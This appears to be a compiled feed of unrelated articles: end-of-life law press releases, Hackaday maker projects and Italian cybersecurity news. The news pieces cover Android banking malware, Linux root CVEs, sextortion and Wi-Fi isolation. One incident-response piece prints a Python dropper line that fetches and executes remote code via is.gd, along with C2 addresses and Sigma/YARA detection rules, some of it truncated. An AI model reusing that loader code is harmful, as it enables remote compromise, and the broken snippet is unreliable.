Filomena Gallo e Marco Cappato commentano: “Dalla maggioranza un atto di irresponsabilità. La competenza regionale è applicata in Toscana, dove la legge è operativa”

“Il Consiglio regionale dell’Abruzzo si è dichiarato incompetente a normare ciò che il Servizio sanitario regionale già è obbligato a fare: dare risposta a chi chiede di essere aiutato a morire. La decisione presa dalla maggioranza è un atto di irresponsabilità nei confronti delle persone malate e dei medici, privati di ogni garanzia sui tempi e sulle modalità per chiedere e ottenere l’aiuto alla morte volontaria. La competenza regionale è stata correttamente applicata dalla Regione Toscana, la cui norma è perfettamente operativa, pur essendo stata impugnata dal Governo.

La questione continuerà a gravare anche sul Servizio sanitario abruzzese, che ha comunque il dovere di rispettare la sentenza “Cappato-Dj Fabo” della Corte costituzionale intervenendo “prontamente” come stabilito dalla stessa Corte nel 2024. Un “dovere” dimostrato anche dalle numerose condanne subite dalle Asl che si sono rifiutate di farlo.

L’assenza di scadenze definite per legge determina lunghi tempi di attesa, come i 2 anni attesi da Federico Carboni e Laura Santi.

Come Associazione Luca Coscioni continueremo ad aiutare le persone che lo chiederanno a far valere i loro diritti, a denunciare nei tribunali i ritardi nelle risposte del Servizio sanitario e ad aiutare anche materialmente chi ne ha diritto a ottenere l’autosomministrazione del farmaco per il “suicidio assistito” anche in Abruzzo.

Ringraziamo le 8.119 persone che hanno reso possibile, con la loro firma, il dibattito sulla legge regionale “Liberi Subito” e tutte le Consigliere e Consiglieri regionali che non hanno nascosto la testa sotto la sabbia e che erano pronti a esprimersi nel merito”.

L'articolo Il Consiglio regionale dell’Abruzzo boccia “Liberi Subito” proviene da Associazione Luca Coscioni.

L’avvocata Filomena Gallo, Segretaria nazionale dell’Associazione Luca Coscioni, partecipa in qualità di relatrice al convegno Democrazia e partecipazione sul tema del fine vita: l’esperienza francese, organizzato su iniziativa della Vicepresidente del Senato, Mariolina Castellone.

L’appuntamento è per martedì 24 giugno 2025, dalle ore 14:00 alle ore 15:30, presso la Sala Nassirya del Senato della Repubblica, in Piazza Madama 11 a Roma. Sarà, comunque, possibile seguire la diretta sei lavori anche sulla TV del Senatoe sulla pagina Facebook della senatrice Mariolina Castellone.

Oltre a Filomena Gallo interverranno i membri della Convenzione cittadina sul fine vita Bintou Mariko e Marc-Olivier Strauss-Khan, l’avvocata Giovanna Marsico, Direttrice del Centro nazionale francese del fine vita e delle cure palliative, Christèle Gautier, già consigliera di Gabinetto delle ministre Agnes Firmin le Bodo e Catherine Vautrin, le senatrici Anna Bilotti, membro del Comitato ristretto sul fine vita, e Alessandra Maiorino, Vicepresidente vicaria del Gruppo del Movimento 5 Stelle. Introduce la senatrice Mariolina Castellone, vicepresidente del Senato, modera la giornalista Valentina Petrini.

Informazioni utili

L’accesso in sala – con abbigliamento consono e per gli uomini con l’obbligo di giacca e cravatta – è consentito fino al raggiungimento della capienza massima. In caso di esaurimento posti in presenza, la conferenza potrà essere seguita in streaming sui canali ufficiali.

Gli ospiti e i giornalisti devono accreditarsi scrivendo a: mariadomenica.castellone@senato.it

Le opinioni e i contenuti espressi nell’ambito dell’iniziativa sono nell’esclusiva responsabilità dei proponenti e dei relatori e non sono riconducibili in alcun modo al Senato della Repubblica o ad organi del Senato medesimo.

L'articolo Filomena Gallo partecipa al convegno “Democrazia e partecipazione sul tema del fine vita: l’esperienza francese” proviene da Associazione Luca Coscioni.

[Anton Gaia]’s SPIRAL sculpture resembles an organizer or modern shelving unit, but what’s really interesting is how it goes together. It’s made entirely from assembling copies of a single component (two, if you count the short ‘end pieces’ as separate) without a fastener in sight. [Anton] made the 3D model available, so check it out for yourself!
The self-similar design of the joint, based on the golden spiral, makes a self-supporting joint that requires neither glue nor fasteners.
The ends of each part form a tight, spiral-shaped joint when assembled with its neighbors. Parts connect solely to themselves without any need of fasteners or adhesives.

The end result is secure, scalable, and with a harmonious structure that is very pleasing to look at. Small wonder [Anton] used it as the basis for artistic work. You can see more pictures here.

The design of the joint is based on the golden spiral (which it turns out is also be a pretty useful chicken coop architecture.)

The parts lend themselves quite well to 3D printing, and we’d like to take a moment to appreciate that [Anton] shared the .step file instead of just an STL. STEP (or STP) files can be imported meaningfully into CAD programs, making it much easier to incorporate the design into one’s own work. STEP is also supported natively in many 3D printer slicers, so there’s no need to convert formats just to print them.

A brief video describing SPIRAL is embedded just below, with a closer look at how the pieces fit together.

youtube.com/embed/y0t-MZ7YiUQ?…

hackaday.com/2025/06/20/spiral…

È stata scoperta una nuova versione del malware Android Godfather che crea ambienti virtuali isolati sui dispositivi mobili per rubare dati dalle applicazioni bancarie.

Ricordiamo che Godfather è stato individuato per la prima volta a marzo 2021 dai ricercatori di ThreatFabric. Da allora, il malware bancario ha subito cambiamenti significativi ed è molto diverso dall’ultimo campione studiato da Group-IB nel dicembre 2022. All’epoca, il malware aveva attaccato 400 applicazioni di criptovalute e servizi bancari in 16 paesi utilizzando overlay HTML.

Come spiegano ora gli specialisti di Zimperium, che hanno scoperto una nuova versione del malware, il malware viene eseguito sul dispositivo in un ambiente virtuale controllato, che consente di spiare in tempo reale, rubare credenziali e manipolare transazioni, mantenendo al contempo un affidabile camuffamento.

Questa tattica è stata individuata per la prima volta alla fine del 2023 nel malware FjordPhantom per Android, che sfruttava anch’esso la virtualizzazione per eseguire applicazioni bancarie all’interno di container per evitare di essere rilevato.

Tuttavia, mentre FjordPhantom ha preso di mira solo gli utenti del Sud-est asiatico, l’ambito di attacco di Godfather è molto più ampio: colpisce oltre 500 applicazioni bancarie, di criptovalute e di e-commerce in tutto il mondo. Gli attacchi di Godfather utilizzano un file system virtuale, un ID di processo virtuale, l’Intent spoofing e la tecnologia StubActivity.

Di conseguenza, affermano gli esperti, l’utente vede solo l’interfaccia reale dell’applicazione e gli strumenti di sicurezza Android non rilevano attività dannose, poiché nel manifest vengono dichiarate solo le azioni dell’applicazione host. Godfather viene distribuito come file APK che contiene un framework di virtualizzazione integrato. Il malware utilizza strumenti open source come VirtualApp e Xposed per intercettare le chiamate.

Una volta attivato sul dispositivo della vittima, il malware verifica la presenza di applicazioni target installate e, se le trova, le inserisce nel suo ambiente virtuale e utilizza StubActivity per l’esecuzione all’interno del contenitore host.

StubActivity è essenzialmente un’Activity fittizia incorporata in un APK dannoso con un motore di virtualizzazione. Non ha un’interfaccia utente o una logica propria: funge solo da proxy, creando un contenitore e avviando Activity reali da applicazioni target (ad esempio, bancarie) all’interno di un ambiente virtuale. In questo modo, Godfather inganna Android facendogli credere che si stia avviando un’applicazione legittima, quando in realtà è il malware a intercettarla e controllarla.

Quando l’utente avvia l’applicazione bancaria reale, Godfather, a cui è stata precedentemente concessa l’autorizzazione a utilizzare il Servizio di Accessibilità, intercetta l’Intent e lo inoltra alla StubActivity all’interno dell’applicazione host. Di conseguenza, una copia virtualizzata dell’applicazione bancaria viene avviata all’interno del contenitore.

Di conseguenza, l’utente vede l’interfaccia reale dell’applicazione, ma tutti i dati riservati ad essa associati possono essere facilmente intercettati. Il suddetto Xposed viene utilizzato per l’API hooking e Godfather ottiene la possibilità di salvare credenziali, password, PIN, tracciare i tocchi e ricevere risposte dal backend bancario.

Inoltre, nei momenti chiave, il malware mostra una falsa sovrapposizione per indurre la vittima a inserire un PIN o una password. Dopo aver raccolto e trasmesso tutti i dati ai suoi operatori, Godfather attende ulteriori comandi dagli hacker per sbloccare il dispositivo, eseguire determinate operazioni con l’interfaccia utente, aprire l’applicazione ed effettuare un pagamento/trasferimento dall’applicazione bancaria reale.

Inoltre, in questo momento l’utente vede una falsa schermata di “aggiornamento” o una schermata nera, in modo che eventuali attività sospette non attirino la sua attenzione. Sebbene la campagna scoperta da Zimperium abbia preso di mira solo alcune app bancarie turche, i ricercatori avvertono che altri operatori di Godfather potrebbero selezionare altri sottoinsiemi delle 500 app prese di mira per attaccare in altre regioni.

L'articolo Android sotto attacco: il malware Godfather ora usa la virtualizzazione per ingannare tutti proviene da il blog della sicurezza informatica.

If he’s anything like us [Duncan Hall] was probably equal parts excited and disgusted when he found a 1987 Macintosh SE case at a garage sale. Excited, because not every day do vintage computers show up at these things. Disgusted, because it had been gutted and coated in house paint; the previous owner apparently wanted to make an aquarium. [Duncan] wanted to make a computer, and after 15 years, he finally did, calling it the PhoeNIX SE.
Note the small hole in the top floppy bay for the laptop webcam.
The NIX part of the name might make you suspect he’s running Linux on it, which yes, he absolutely is. The guts of this restomod were donated from a Dell XPS laptop, whose Core i7 CPU and motherboard power the project. A 9.7″ LCD serves in place of the original monochrome CRT, held in place by 3D printed hardware. While a purist might complain, it’s not like anyone makes replacement CRTs anymore, and once that’s gone? You might as well go full modern. (The analog board, on the other hand, is available. So is the logic board, if you were wondering. Lacking a CRT, some might have chosen e-ink instead, but the LCD looks good here.)
All ports are on the rear, as Steve would have wanted. That original sticker survived under latex paint is a spot of luck.
Having gone full modern, well, there’s no need for the M5011’s dual floppies, so one of them holds a webcam and monitor for a modern experience. A zoom call from that case would be a bit surreal, but we really appreciate the use of the empty floppy bay to keep the clean lines of the Macintosh SE unaltered. The other floppy bay (this is a dual-floppy unit) appears empty; we might have put an SD-card reader or something in there, but we absolutely agree with [Duncan]’s choice to 3D Print a new back panel and keep all I/O on the rear of the case, as God and Steve Jobs intended.

However you feel about restomodding retrocomputers (and we’re aware it’s a controversial practice), I think we can all agree this is a much better fate for the old Mac than becoming an aquarium. Thanks to [Loddington] for the tip.

If you’re on the side of the aisle that prefers to see restorations than restomods, the tips line is waiting for some quality restorations.

hackaday.com/2025/06/19/mac-se…

All-in-one computers in which the mainboard lurked beneath a keyboard were once the default in home computing, but more recently they have been relegated to interesting niche devices such as the Raspberry Pi 400 and 500.

The Bento is another take on the idea, coming at it not with the aim of replacing a desktop machine, instead as a computer for use with wearable display glasses. The thinking goes that when your display is head mounted, why carry around a screen with your laptop.

On top it’s a keyboard, but underneath it’s a compartmentalized space similar to the Japanese lunchboxes which lend the project its name. The computing power comes courtesy of a Steam Deck so it has a USB-C-for-everything approach to plugging in a desktop, though there’s a stated goal to produce versions for other boards such as the Raspberry Pi. There’s even an empty compartment for storage of peripherals.

We like this computer, both for being a cyberdeck and for being without a screen so not quite like the other cyberdecks. It’s polished enough that we could almost imagine it as a commercial product. It’s certainly not the first Steam Deck based cyberdeck we’ve seen.

hackaday.com/2025/06/20/bento-…

Gli esperti avvertono che due nuove vulnerabilità di escalation dei privilegi locali possono essere sfruttate per ottenere privilegi di root sui sistemi che eseguono le distribuzioni Linux più diffuse. Il primo bug (CVE-2025-6018 è stato scoperto nella configurazione del framework Pluggable Authentication Modules (PAM) in openSUSE Leap 15 e SUSE Linux Enterprise 15. Il problema consente ad aggressori locali di ottenere privilegi utente allow_active.

Un altro bug (CVE-2025-6019) è stato scoperto in libblockdev e consente all’utente allow_active di ottenere privilegi di root tramite il demone udisks (un servizio di gestione dell’archiviazione utilizzato di default nella maggior parte delle distribuzioni Linux). Sebbene concatenare queste vulnerabilità consenta agli aggressori di ottenere rapidamente privilegi di root e di assumere il controllo completo del sistema, va sottolineato che il problema libblockdev/udisks è estremamente pericoloso anche da solo.

“Sebbene tecnicamente lo sfruttamento richieda privilegi allow_active, udisks è incluso di default in quasi tutte le distribuzioni Linux, quindi praticamente qualsiasi sistema è vulnerabile”, ha spiegato la Qualys Threat Research Unit (TRU), che ha scoperto entrambi i problemi. “Le tecniche per ottenere privilegi allow_active, incluso il problema PAM discusso in precedenza, abbassano ulteriormente questa barriera. Un aggressore può sfruttare queste vulnerabilità per compromettere immediatamente un sistema con il minimo sforzo.”

Gli ingegneri di Qualys hanno creato exploit PoC e sfruttato con successo la vulnerabilità CVE-2025-6019 per ottenere privilegi di root sui sistemi che eseguono Ubuntu, Debian, Fedora e openSUSE Leap 15. Nel suo rapporto, il team di consulenza sulla sicurezza di Qualys ha condiviso informazioni tecniche più dettagliate sulle vulnerabilità; i link alle soluzioni sono disponibili su Openwall .

“Data l’ubiquità degli udisk e la facilità con cui vengono sfruttati, le organizzazioni dovrebbero considerare questa vulnerabilità un rischio critico e continuo e implementare immediatamente le patch”, hanno affermato gli esperti. A proposito di vulnerabilità Linux, questa settimana la Cybersecurity and Infrastructure Security Agency (CISA) statunitense ha lanciato l’allarme sullo sfruttamento attivo di un vecchio bug, CVE-2023-0386 . Questo bug colpisce il sottosistema OverlayFS del kernel Linux e consente a un aggressore locale di aumentare i privilegi.

L'articolo Linux Alert: Il bug su udisks consente l’accesso a Root sulle principali distribuzioni proviene da il blog della sicurezza informatica.

“Permesso Negato” è una organizzazione non-profit la cui mission è fornire assistenza alle persone vittime di condivisione non consensuale di materiale intimo.

Questo reato negli ultimi anni ha registrato una enorme diffusione, non solo grazie alle nuove tecnologie e ai nuovi strumenti che lo rendono tecnicamente agevole, ma anche grazie allo sviluppo di una nuova sensibilità culturale che, anche mediante i canali di informazione di massa, ne dà la giusta rilevanza

“Permesso negato” ha recentemente pubblicato report all’esito di una indagine condotta tra le vittime a cui l’associazione ha fornito sostegno, in cui analizza il tema da diversi punti di approccio: giuridico, psicologico e sociologico.

Strumenti di controllo

“Permesso negato” e altre realtà hanno sviluppato uno strumento che consente alle vittime, reali o potenziali, di generare un codice hash del materiale che temono possa essere pubblicato. Il codice di hash altro non è che una stringa alfanumerica, univoca (non può esservene un’altra uguale), generata da un algoritmo in relazione al contenuto di un file. Di fatto si tratta di una sorta di impronta digitale del file in questione. Poiché ogni duplicazione del file avrà lo stesso codice di hash, le associazioni che partecipano al progetto condivideranno il codice con la propria rete. In questo modo sarà possibile dare un contributo nel rilevare e rimuovere i contenuti pubblicati senza autorizzazione.

Tra i siti internet che forniscono questo servizio troviamo Stop.NCII per gli adulti e Take It Down per i minorenni.

L’indagine

Il report pone in evidenza i suoi limiti: il dataset è limitato solo alle vittime che spontaneamente hanno contattato l’associazione. Tuttavia, essendo un set di circa mille soggetti, può comunque offrire uno “spaccato” significativo, utile per l’ attività di analisi.

In secondo luogo, poiché il report vuole focalizzare l’attenzione sulle vittime maschili di questa tipologia di reato, il dataset rischia di essere ampiamente sottodimensionato. Infatti il senso di panico, vergogna e vulnerabilità che spesso inibisce le vittime dal denunciare quanto accaduto, porta a ritenere che i numeri reali potrebbero essere ben più rilevanti.

Il reato- la sextortion

La condotta di pubblicazione di materiale a contenuto sessuale, senza consenso, è disciplinata penalmente dall’art. 612-ter del Codice Penale. L’articolo in questione è titolato “diffusione illecita di immagini o video sessualmente espliciti”. Definizione certamente più corretta rispetto a quella più popolare di revenge porn.

L’etichetta di revenge porn, infatti, è fuorviante poiché presuppone un intento vendicativo (revenge, appunto) da parte del soggetto agente, mentre il fenomeno è ben più diffuso. Le motivazioni ritorsive sono solo una parte delle ragioni che muovono l’autore del reato il quale, molto spesso, ha l’obiettivo del guadagno. In questo caso compie una vera e propria condotta estorsiva.

Il fenomeno della sextortion individua la condotta attraverso cui un soggetto minaccia la vittima di rivelare notizie e di diffondere immagini di natura sessuale che la riguardano, in modo da costringerla a comportarsi in un certo modo.

Spesso queste immagini e video vengono acquisite mediante attività di hacking tra le più diverse, dall’accesso abusivo a reti informatiche ad attività di social engeneering. Quest’ultima è la condotta analizzata dal report in discussione.

Il luogo del delitto

Una ulteriore circostanza qualificante che accomuna molti reati perpetrati tramite estorsione informatica, è che spesso la richiesta riguarda il pagamento di somme di denaro. Procedura che si compie mediante pagamenti telematici.

Ne consegue che il luogo in cui si produce “il danno” (cioè quello in cui avviene l’addebito della somma), è diverso dal luogo ove si realizza l’ingiusto profitto (l’accredito della somma). A volte, quando vengono utilizzati metodi di pagamento che non consentono accrediti immediati, anche il tempo del danno è diverso da quello del profitto.

La giurisprudenza ha chiarito che il luogo di commissione del delitto è quello dell’accredito delle somme (es. ove è stato aperto il conto corrente beneficiario), e il tempo del reato è quello in cui avviene l’accredito della somma.

Sul tema della qualificazione del reato, gli autori del report auspicano l’introduzione di un delitto specifico di estorsione sessuale nel codice penale. Chi scrive, per diverse ragioni, non concorda con questa idea poiché, a differenza degli autori del report, non ritiene che un nuovo reato possa fornire quella chiarezza giuridica o quella sensibilizzazione auspicata dagli autori del lavoro qui presentato.

Le indagini

I reati commessi mediante l’ausilio di tecnologie informatiche richiedono specifiche attività di indagine, disciplinate dalla L. 48/2008 per cui l’Autorità Giudiziaria può acquisire informazioni con misure tecniche che ne assicurino la conservazione dei dati originali e che ne impediscano l’alterazione. Una delle modalità più sicure e utilizzate è rappresentata dalla copia forense dei file, cioè una copia esatta delle informazioni presenti sul supporto informatico.

Il tema inerente alla valenza probatoria degli screenshot ha generato diverse discussioni nell’ambiente giuridico, e ha visto pronunce diverse e contrastanti da parte della giurisprudenza. La Corte di Cassazione ha infatti confermato, in diverse occasioni, la valenza probatoria degli screenshot come mezzi idonei a dimostrare l’esistenza dei messaggi di testo rappresentati nell’immagine. Invero recentemente la stessa Corte ha ritenuto di correggere questo suo indirizzo, quantomeno per quanto concerne le prove raccolte dalla Polizia Giudiziaria, la quale è chiamata a dare applicazione alle tecniche di digital forensics.

I Dati

Lo studio si è basato su più di mille casi raccolti dall’associazione che lo ha condotto, e l’analisi delle informazioni raccolte ha riservato alcune sorprese.

In particolare, si scopre che il maggior numero di vittime del reato di sextortion è di genere maschile. Quasi il 90% dei casi riguarda uomini che, adescati sul web e convinti a condividere informazioni e immagini personali, vengono successivamente minacciati al fine di ottenere dei benefici.

In molti di questi casi, l’esca utilizzata è stata l’immagine di una donna, ulteriore conferma della tendenza alla sessualizzazione del corpo femminile.

La strategia di adescamento

L’adescamento della vittima segue, tendenzialmente, alcune fasi ben specifiche.

In un primo momento la vittima viene contattata, solitamente su piattaforme molto note e utilizzate. Dopo un primo approccio inizia la condivisione di informazioni personali: alcune emergono durante la conversazione pilotata dall’attaccante, altre informazioni vengono invece carpite dal profilo del social network a cui la vittima è registrata.

A questo punto il bersaglio dell’attacco viene convinto a spostare la conversazione su piattaforme diverse, notoriamente più restie a collaborare con l’Autorità durante le indagini. Qui la conversazione viene abilmente dirottata su temi più intimi, convincendo la vittima che questo livello di confidenza sia del tutto normale.

Una volta ottenute informazioni, immagini o testi compromettenti, questi vengono registrati dal criminale, il quale ora conclude la propria strategia mettendo in campo la minaccia di divulgare il contenuto della conversazione, qualora la vittima non soddisfi le sue richieste.

In questa fase si registrano due diverse domande, a seconda del genere sessuale di appartenenza della vittima. Se questa è una donna, l’attaccante tende a chiedere ulteriore materiale sessualmente esplicito. Se la vittima è un uomo, viene indirizzata una richiesta economica.

Anche in questo frangente si assiste all’enfatizzazione del pregiudizio di genere: la donna vista come oggetto del desiderio sessuale, l’uomo considerato per la sua capacità economica.

Inizialmente l’estorsore formula richieste economicamente molto elevate, adottando una strategia aggressiva. Ciò gli consente di lasciare credere alla sua vittima di avere il controllo della situazione quando questa inizierà a trattare e l’attaccante fingerà di acconsentire a ridurre le proprie richieste incontrando le richieste avanzate dalla sua vittima.

Il ruolo delle piattaforme on-line

I provider di servizi on-line non sono legalmente responsabili per i contenuti pubblicati dai loro utenti, salvo il caso in cui abbiano consapevolezza effettiva dell’illecito e non rimuovano tempestivamente i contenuti illegali.

Il Digital Service Act, in vigore dal 2023, ha introdotto alcuni obblighi per le piattaforme aventi più di 45 milioni di utenti mensili. Queste realtà ora sono obbligate ad essere maggiormente coinvolte nella lotta ai contenuti illeciti, bilanciando libertà di espressione e tutela degli utenti.

Il rapporto psicologico tra vittima ed estorsore

Si sviluppa in una dinamica di controllo progressivo ove il ricattatore, acquisita la fiducia della sua vittima, dà vita ad un ciclo di minacce e richieste. La vittima vive una sensazione di impotenza e invoca un intervento salvifico esterno. Il persecutore, invece, adotta un ruolo autoritario, colpevolizzando la vittima.

A volte accade che la vittima si responsabilizzi della situazione, andando così ad alimentare una forma di auto-persecuzione che si aggiunge a quella già finalizzata dall’estorsore.

In alcune occasioni il persecutore si pone anche nel ruolo del salvatore, quando offre alla vittima una soluzione, ad esempio promettendo di non divulgare il materiale sottratto, in cambio del soddisfacimento delle sue richieste. Naturalmente questo è un ulteriore livello di manipolazione della vittima. Questo atteggiamento, infatti, lungi dall’essere una offerta di aiuto, rappresenta una strategia di controllo a lungo termine mediante l’alimentazione dell’illusione di una ipotetica conclusione della vicenda, senza però restituire mai alla vittima la reale libertà.

Le reazioni

Le vittime reagiscono in molti modi diversi. Alcune persone provano ad affrontare la minaccia direttamente, ad esempio denunciando il ricattatore o bloccando ogni canale di contatto e chiedendo supporto tecnico-legale.

In altri casi la vittima si rifiuta di affrontare la realtà, si isola o adotta comportamenti autolesivi.

Una delle conseguenze a lungo termine più rilevanti è lo sviluppo di Disturbi da Stress Post-traumatico. L’esperienza traumatica, infatti, non riguarda solo l’evento singolarmente considerato, bensì la “cronicizzazione della minaccia”. Il timore che il materiale utilizzato per l’estorsione possa riemerge in futuro o che il ricattatore torni a manifestare le sue richieste, determinano uno stato di allerta costante nella vittima.

La società

Da una indagine svolta da Save the Children nel 2024 è emerso che la maggior parte dei ragazzi minorenni intervistati ritiene che chi invia foto intime sia consapevole, e quindi si assuma i rischi derivanti da questo comportamento, mentre il 34% ritiene che ricevere foto intime non richieste sia una manifestazione di interesse, soprattutto tra i maschi coinvolti in una relazione sentimentale

E il futuro?

La diffusione dell’intelligenza artificiale ha amplificato e moltiplicato i pericoli. Attraverso questi strumenti, infatti, è possibile creare scenari iperrealistici che possono essere utilizzati anche a fini estorsivi.

Si pensi al caso dei deep nudes, immagini o video alterati per mostrare persone nude senza aver avuto alcun consenso.

Questi strumenti vengono utilizzati anche per creare immagini di donne in atteggiamenti sensuali da utilizzare come “esche” per l’adescamento iniziale sul web. In questo caso vi è una seconda vittima: la persona a cui sono state sottratte le immagini e modificate.

In ultimo, si pensi alla possibilità di creare immagini di nudo compromettenti e falsi partendo da fotografie pubblicate sui social network, che vengono poi sfruttate come leva per il ricatto. In questo caso l’estorsore non deve neppure “mettere in campo” tutte quelle strategie e fasi di cui si è parlato nelle righe precedenti.

La condivisione di informazioni on-line è una attività che rischia di rivelarsi pericolosa e che ha rovinato delle vite, per tale ragione è sempre più fondamentale una adeguata educazione digitale per gli utenti di ogni età.

Qui la pagina web da cui è possibile effettuare il download del report.

L'articolo Sextortion – reati informatici e sessuali, una analisi multidisciplinare della vittimologia maschile proviene da il blog della sicurezza informatica.

Accessi anomali e un loader Invisibile: storia di un attacco fileless evitato per un soffio

Abstract: Un caso reale di incident response porta alla scoperta di quello che chiameremo “Unknown Malware AP”, un sofisticato loader fileless basato su Python, capace di eseguire codice remoto usando Telegram e is.gd come vettori. Il malware sfugge ai rilevamenti tradizionali, ma viene individuato grazie all’intuito analitico e alla correlazione tra eventi di basso impatto.

L’articolo ricostruisce la catena di compromissione, le modalità di esecuzione fileless e le tecniche di detection efficaci per intercettarlo.

Introduzione

Quando un cliente mi chiama con preoccupazione per delle e-mail di mancato recapito verso indirizzi sconosciuti, la mente va subito a un possibile caso di spoofing o compromissione. Ma quello che si nascondeva sotto era molto di più: un loader fileless, invisibile agli antivirus e capace di eseguire codice remoto usando Telegram come canale di comando.

L’intervento di emergenza

La mailbox di un dipendente invia email fantasma, generate da un’origine ignota. Il primo passo è deployare un EDR su tutte le macchine della rete. Quasi subito emergono anomalie: un processo parte da un percorso insolito `C:\Users\Public\Windows\svchost.exe` e lancia un file denominato `Photos`.

La command line incriminata è:

"C:\Users\Public\Windows\svchost.exe"
C:\Users\Public\Windows\Photos

Il file `svchost.exe`, dal nome ingannevole ed in un percorso decisamente anomalo, risulta essere un interprete Python.

L’hash SHA256 è: ff507b25af4b3e43be7e351ec12b483fe46bdbc5656baae6ad0490c20b56e730

Nonostante l’analisi su VirusTotal non evidenzi nulla di sospetto, qualcosa, come evidente, non torna.

Il nodo: il file `Photos`

Grazie all’EDR, ispeziono le linee di comando e identifico Photos come il vero core: un file codificato in Base64 che, una volta decifrato, rivela un dropper Python che esegue questo codice:

import requests, re

exec(requests.get(requests.head(f'https://is.gd/{match.group(1)}', allow_redirects=True).url).text)

if (match := re.search(r'

Connessioni anomale

L’EDR registra comunicazioni verso tre IP:

• 45.63.94.214
• 104.25.233.53
• 149.154.167.99

Il tutto, classificato solo come alert di media gravità. Un segnale che, in un SOC affollato da log e warning, sarebbe potuto passare inosservato.

Un loader su misura

Non esistono corrispondenze pubbliche note con altri loader. Nessuna traccia in ambienti come Hybrid Analysis, VirusTotal ed altri strumenti di analisi. Tutto lascia supporre che si tratti di un loader sviluppato su misura, potenzialmente generato o rifinito con strumenti AI.

Epilogo: la differenza tra SOC automatico e analisi umana

In un contesto altamente rumoroso, questo attacco avrebbe potuto annidarsi per mesi senza essere scoperto. Nessuna firma, nessuna traccia persistente, solo una command line anomala e delle email di rimbalzo come unica spia.

Ma proprio quell’incongruenza, colta dall’intuito umano, ha dato inizio all’analisi.

Un’analisi che ha rivelato un dropper silente, che avrebbe potuto aprire la strada aransomware, backdoor, esfiltrazione.

Non è finita con un disastro.

Ma ci è mancato poco.

Regole utili al rilevamento

Sigma Rule:

title: Python Fileless Loader via Telegram and is.gd
logsource:
category: process_creation
product: windows
detection:
selection:
Image: '*\\python.exe'
CommandLine|contains:
- requests.get(
- exec(
- t.me/
- is.gd/
condition: selection
level: high
description: Detects Python-based fileless dropper fetching payload via Telegram + is.gd
author: Agostino Pellegrino
falsepositives:
- Development environments using dynamic remote loading (rare)
references:
- attack.mitre.org/techniques/T1…
- attack.mitre.org/techniques/T1…
tags:
- attack.t1059
- attack.t1071.001
- fileless
- telegram
- loader
YARA Rule:
rule Unknown_Malware_AP_Fileless_Telegram_Loader {
meta:
description = "Detects Python fileless dropper using Telegram and is.gd"
author = "Agostino Pellegrino"
version = "1.0"
date = "2025-06-18"
strings:
$py_exec_requests = "exec(requests.get(" ascii
$py_telegram_url = "https://t.me/" ascii
$py_isgd_url = "https://is.gd/" ascii
$py_og_regex = "og:description" ascii
condition:
2 of them and filesize

L'articolo Stealth Malware: la nuova frontiera del cybercrime proviene da il blog della sicurezza informatica.

Come avrete ormai capito nella nostra Rubrica WiFi su RedHotCyber, abbiamo intrapreso un viaggio tecnico e pratico nel mondo delle reti wireless, partendo dalla loro origine storica fino ad arrivare agli attacchi reali che colpiscono quotidianamente utenti e infrastrutture.

Dopo aver esplorato:

• la natura delle reti 802.11 e il loro funzionamento di base;
• i falsi miti più diffusi tra gli utenti (HTTPS, VPN, reti nascoste);
• e aver dimostrato sul campo vulnerabilità e tecniche di attacco (sniffing, DNS spoofing, captive portal hijacking),

abbiamo iniziato ad analizzare anche le prime contromisure, come l’introduzione dei sistemi AAA combinati ai captive portal, utili a regolamentare l’accesso e tracciare gli utenti.

Con questo articolo vogliamo fare un passo in più: andare oltre la semplice segmentazione delle reti e affrontare un aspetto spesso trascurato ma fondamentale, ovvero l’isolamento del traffico locale a livello Layer 2. Perché, come vedremo, segmentare senza isolare è come mettere delle porte… ma senza pareti.

Segmentazione L3

In molti articoli di cybersecurity si enfatizza l’importanza della segmentazione a livello Layer 3, ovvero la suddivisione logica del traffico tramite subnet IP e dispositivi di routing come firewall o router di livello 3. In questo approccio, ogni gruppo di utenti o dispositivi viene collocato in una subnet distinta, e il traffico tra i segmenti viene regolato da apposite policy di accesso definite sul firewall perimetrale.

Questa architettura si basa su tre principi fondamentali:

• Privilegio minimo: ogni dispositivo o utente deve poter accedere solo alle risorse strettamente necessarie, riducendo così la superficie di attacco.
• Definizione chiara dei confini: i segmenti devono essere separati da barriere ben definite per impedire movimenti laterali non autorizzati.
• Monitoraggio continuo: è essenziale rilevare tempestivamente attività sospette o traffico anomalo tra i segmenti per reagire rapidamente a eventuali violazioni.

Per applicare correttamente questo tipo di segmentazione, ogni dispositivo deve essere classificato in base alla funzione e al rischio, e assegnato al segmento più appropriato. Un esempio pratico potrebbe essere:

• VLAN X – Guest WiFi → 192.168.X.0/24
• VLAN Y – Uffici → 192.168.Y.0/24
• VLAN Z – Server → 192.168.Z.0/24

Sulla base del principio del privilegio minimo, le policy di firewall potrebbero essere strutturate così:

• VLAN X (Guest): nessuna comunicazione verso altre VLAN; accesso solo a Internet, con limiti di banda e filtraggio contenuti.
• VLAN Y (Uffici): accesso selettivo solo ad alcuni server (es. DNS, posta, file server), e priorità maggiore sulla navigazione rispetto ai guest.

Tuttavia, nelle reti WiFi Guest e BYOD (Bring Your Own Device), la segmentazione L3 non è sufficiente. Anche se i dispositivi sono assegnati a VLAN distinte e soggetti a regole firewall, possono comunque comunicare tra loro a livello Layer 2.

Questo apre la porta e ci espone a diverse tecniche di attacco interne. Non dimentichiamo una delle regole fondamentali della cybersecurity: bloccare la minaccia il più vicino possibile alla fonte. E il Layer 2 è il punto più vicino al dispositivo e all’utente, dove il controllo deve essere immediato e puntuale

Per questo motivo, non basta segmentare: è fondamentale isolare il traffico anche a livello Layer 2, impedendo ogni comunicazione diretta tra dispositivi all’interno dello stesso segmento. Solo così si può garantire una reale sicurezza in ambienti condivisi o ad alto rischio.

Andiamo a capire quindi come possiamo isolare il traffico a livello 2.

Client Isolation su WiFi:

La funzione di Client Isolation, disponibile su molti access point e controller WiFi, è progettata per impedire la comunicazione diretta tra dispositivi wireless connessi allo stesso SSID. Questa misura agisce a livello Layer 2 dell’infrastruttura WiFi, bloccando il traffico locale (come pacchetti ARP, broadcast, o traffico multicast) tra i dispositivi client.

In pratica, quando un dispositivo tenta di comunicare con un altro client sulla stessa rete wireless, i pacchetti vengono intercettati e bloccati direttamente dall’infrastruttura WiFi. Ciò previene attacchi interni come:

Esistono principalmente due modalità operative per implementare il Client Isolation a livello Layer 2:

1. Dinamica basata su DHCP e Default Gateway
   In questa modalità, al momento della connessione alla rete WiFi, il client riceve un indirizzo IP tramite DHCP, e viene automaticamente autorizzato a comunicare esclusivamente con il MAC address del gateway predefinito. L’infrastruttura applica un filtro a livello Layer 2 che blocca qualsiasi altra comunicazione locale.
   
   • ✅ Vantaggi:
     
